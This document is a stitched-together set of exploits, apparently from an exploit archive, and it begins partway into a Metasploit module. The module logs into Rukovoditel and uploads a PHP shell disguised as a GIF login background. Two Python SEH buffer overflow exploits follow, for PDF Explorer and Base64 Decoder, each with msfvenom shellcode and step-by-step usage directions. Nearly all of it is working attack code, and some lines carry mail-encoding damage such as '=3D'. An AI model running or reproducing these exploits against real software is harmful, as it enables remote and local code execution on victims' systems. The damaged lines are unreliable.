if not (res1 and res1.body =~ /form_session_token\"
value=\"([^\"]+)\"/)
return nil
end
token = $1
##
# Authorized User Login
##
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri,
"/index.php?module=users/login&action=login"),
'cookie' => cookie,
'vars_post' => {
"form_session_token" => token,
"username" => datastore['USER'],
"password" => datastore['PASS']
}
})
##
# Login Control
##
tok = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri,
"/index.php?module=dashboard/"),
})
html = tok.body
if html =~ /Rukovoditel/
print_good("Login Successful")
else
print_status("User information is incorrect. Login failed")
exit 0
end
##
# Arbitrary ".pHp" file upload
##
boundary = Rex::Text.rand_text_alphanumeric(29)
data = "-----------------------------{boundary}\r\n"
data << "Content-Disposition: form-data;
name=\"form_session_token\"\r\n"
data << "\r\n"
data << "{token}"
data << "\r\n-----------------------------{boundary}\r\n"
data << "Content-Disposition: form-data;
name=\"CFG[LOGIN_PAGE_HEADING]\"\r\n"
data <<
"\r\nPage-Heading\r\n-----------------------------{boundary}\r\n"
data << "Content-Disposition: form-data;
name=\"CFG[LOGIN_PAGE_CONTENT]\"\r\n"
data << "\r\nPage-Desc\r\n-----------------------------{boundary}\r\n"
data << "Content-Disposition: form-data;
name=\"APP_LOGIN_PAGE_BACKGROUND\"; filename=\"akkus.pHp\"\r\n"
data << "Content-Type: binary/octet-stream\r\n"
data << "\r\n"
data << "GIF89a;\n<html>\n"
data << "\n</html>\n"
data << payload.encoded
data << "\r\n-----------------------------{boundary}\r\n"
data << "Content-Disposition: form-data;
name=\"CFG[APP_LOGIN_PAGE_BACKGROUND]\"\r\n"
data << "\r\n{upload_name}\r\n"
data << "-----------------------------{boundary}\r\n"
data << "Content-Disposition: form-data;
name=\"CFG[LOGIN_PAGE_HIDE_REMEMBER_ME]\"\r\n"
data << "\r\n0\r\n-----------------------------{boundary}--\r\n"
res2 = send_request_cgi({
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data;
boundary=---------------------------{boundary}',
'cookie' => cookie,
},
'uri' => normalize_uri(target_uri,
"/index.php?module=configuration/save&redirect_to=configuration/login_page")
})
##
# Informations
##
print_status("#{peer} - Uploading in progress...")
print_good("Upload Successful")
##
# Calling Shell File Name
##
shellc = send_request_cgi({
'method' => 'GET',
'cookie' => cookie,
'uri' => normalize_uri(target_uri,
"/index.php?module=configuration/login_page"),
})
if not (shellc and shellc.body =~ /CFG_APP_LOGIN_PAGE_BACKGROUND\"
value=\"([^\"]+)\"/)
return nil
end
shelln = $1
print_good("#{peer} - Payload uploaded as #{shelln}")
register_file_for_cleanup(shelln)
##
# Get Session
##
send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri, "/uploads/", shelln),
})
end
end
# Exploit Title: PDF Explorer SEH Local Exploit
# Original Discovery:Gionathan "John" Reale (DoS exploit)
# Exploit Author: Achilles
# Date: 18-12-2018
# Vendor Homepage: http://www.rttsoftware.com/
# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip
# Tested Version: 1.5.66.2
# Tested on: Windows XP SP3
# 1.- Run python code : PDF_Explorer.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open PDF Explorer
# 4.- When inside the program click "Database" > "Custom fields settings...
"
# 5.- Paste the content of EVIL.txt into the Field:'Label'and the calculator will Open
# 7.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/python
#!/usr/bin/env python
buffer =3D "\x41" * 292
NSEH =3D "\xeb\x06\x90\x90" #jmp short 6
SEH =3D "\x3f\x28\xd1\x72" #0x72d1283f pop eax # pop esi # ret 0x04 [msacm32.drv]
nops =3D "\x90" * 20
#msfvenom -p windows/exec CMD=3Dcalc.exe -b "\x00\x0a\x0d\x23\x80" -f pytho=
n
schellcode =3D ("\xda\xcb\xbf\xbd\x81\x73\x52\xd9\x74\x24\xf4\x5e\x29"=20
"\xc9\xb1\x31\x31\x7e\x18\x03\x7e\x18\x83\xc6\xb9\x63"
"\x86\xae\x29\xe1\x69\x4f\xa9\x86\xe0\xaa\x98\x86\x97"
"\xbf\x8a\x36\xd3\x92\x26\xbc\xb1\x06\xbd\xb0\x1d\x28"
"\x76\x7e\x78\x07\x87\xd3\xb8\x06\x0b\x2e\xed\xe8\x32"
"\xe1\xe0\xe9\x73\x1c\x08\xbb\x2c\x6a\xbf\x2c\x59\x26"
"\x7c\xc6\x11\xa6\x04\x3b\xe1\xc9\x25\xea\x7a\x90\xe5"
"\x0c\xaf\xa8\xaf\x16\xac\x95\x66\xac\x06\x61\x79\x64"
"\x57\x8a\xd6\x49\x58\x79\x26\x8d\x5e\x62\x5d\xe7\x9d"
"\x1f\x66\x3c\xdc\xfb\xe3\xa7\x46\x8f\x54\x0c\x77\x5c"
"\x02\xc7\x7b\x29\x40\x8f\x9f\xac\x85\xbb\x9b\x25\x28"
"\x6c\x2a\x7d\x0f\xa8\x77\x25\x2e\xe9\xdd\x88\x4f\xe9"
"\xbe\x75\xea\x61\x52\x61\x87\x2b\x38\x74\x15\x56\x0e"
"\x76\x25\x59\x3e\x1f\x14\xd2\xd1\x58\xa9\x31\x96\x97"
"\xe3\x18\xbe\x3f\xaa\xc8\x83\x5d\x4d\x27\xc7\x5b\xce"
"\xc2\xb7\x9f\xce\xa6\xb2\xe4\x48\x5a\xce\x75\x3d\x5c"
"\x7d\x75\x14\x3f\xe0\xe5\xf4\xee\x87\x8d\x9f\xee")
payload =3D buffer + NSEH + SEH + nops + schellcode
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
#!/usr/bin/env python
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
# Date: 12-20-18
# Vulnerable Software: Base64 Decoder 1.1.2
# Vendor Homepage: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. copy/paste base.txt contents into 'save to file' section of app
# 3. select decode
# 4. pop calc
# orig dos poc from UN_NON, EDB: 39070
import struct
junk3 = "\x41" * 90
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
junk2 = "\xcc"*50
#jump to calc
jmp3 = "\xe9\xaf\xfd\xff\xff\xcc"
junk1 = "\xcc"*20
#jump to jmp3
jmp2 = "\xeb\xe4\xcc\xcc\xcc\xcc"
#jump to jmp2
jmp1 = "\xeb\xf8\xcc\xcc"
#0x0045241e : pop esi # pop ebx # ret
seh = struct.pack('<L',0x0045241e)
buffer = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh
with open("base.txt","wb") as f:
f.write(buffer[:-1])